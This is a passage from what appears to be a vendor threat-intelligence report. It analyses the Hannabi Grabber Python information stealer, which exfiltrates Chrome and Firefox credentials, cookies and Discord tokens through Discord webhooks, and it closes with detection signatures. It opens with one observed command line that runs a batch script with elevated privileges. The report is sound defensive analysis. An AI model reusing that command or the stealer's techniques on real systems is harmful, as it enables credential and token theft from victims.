C:\Windows\system32\cmd.exe /c cd %appdata%\Microsoft\Network && powershell -Command start script.bat -Verb RunAs

**Hannabi Grabber**

The final cluster of malware associated with this loader is responsible for retrieving and executing a Python-based information stealer called Hannabi Grabber. In the samples we analyzed, the Python version retrieved does not natively contain the modules required for the script to successfully execute causing the infection process to fail, however, given the volume of features present in the stealer, we analyzed it to confirm detection capabilities in the case that it is distributed via different mechanisms.

Hannabi Grabber is a full-featured information stealer written in Python. It leverages Discord Webhooks for C2 and data exfiltration. It currently features support for stealing information from a variety of applications that may be present on victim systems. It collects survey information from the infected machine, obtains the geographic location of the system via the IPInfo service, takes screenshots and eventually transmits that data to an attacker-controlled Discord server in JSON format.

Below is a listing of many of the various applications the stealer supports.

In addition to the previously listed applications, the malware also supports retrieving password and cookie data from Chrome, as shown below.

Similar functionality also exists to target Mozilla Firefox browser data that may be present on the system.

The information stealer is particularly interested in Discord and Roblox data. It features several mechanisms that check for the existence of Discord Token Protectors such as DiscordTokenProtector, BetterDiscord and more. If discovered, the malware will attempt to bypass them to obtain Discord tokens from the victim. An example of one of these checks is shown below.

Application data that is collected is stored within a directory structure inside of the %TEMP% directory, in a folder called “RedDiscord” that is created by the malware. Before exfiltrating the data, the malware creates a ZIP archive within the RedDiscord directory called “Hannabi-<USERNAME>.zip.” The malware first transmits beacon information and will then attempt to exfiltrate the newly created ZIP archive.

Hannabi Grabber has a significant amount of functionality that is common to information-stealing malware. Typically, attackers will attempt to leverage PyInstaller or Py2EXE to compile their Python into a PE32 file format prior to distributing it to victims. This is a case where instead, the attacker chose to include a Python installation process during the infection and is leveraging Python directly to steal sensitive information from victims.

**Conclusion**

Many new Web3 technologies have emerged recently, attempting to provide valuable functionality to users. As these technologies have continued to see increased adoption for legitimate purposes, they have begun to be leveraged by adversaries as well. We have continued to observe an increase in the volume of malware and phishing campaigns that are taking advantage of technologies like IPFS for the purposes of hosting malicious components used in malware infections, phishing kits used to collect sensitive authentication data and more.

We expect this activity to continue to increase as more threat actors recognize that IPFS can be used to facilitate bulletproof hosting, is resilient against content moderation and law enforcement activities, and introduces problems for organizations attempting to detect and defend against attacks that may leverage the IPFS network. Organizations should be aware of how these newly emerging technologies are being actively used across the threat landscape and evaluate how to best implement security controls to prevent or detect successful attacks in their environments.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 60728.

The following ClamAV signatures are applicable to this threat:

*   Win.Trojan.AgentTesla-9974905-1
*   Pdf.Phishing.Agent-9974919-0
*   Txt.Malware.ArtifactDeletion-9974896-0
*   Win.Trojan.AgentTesla-9974906-0
*   Win.Downloader.ReverseShell-9974652-1
*   Win.Loader.Hannabi-9974435-0
*   Win.Trojan.Hannabi\_Grabber-9974436-0
*   Py.Malware.ReverseShell-9974437-0

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

Tag

#firefox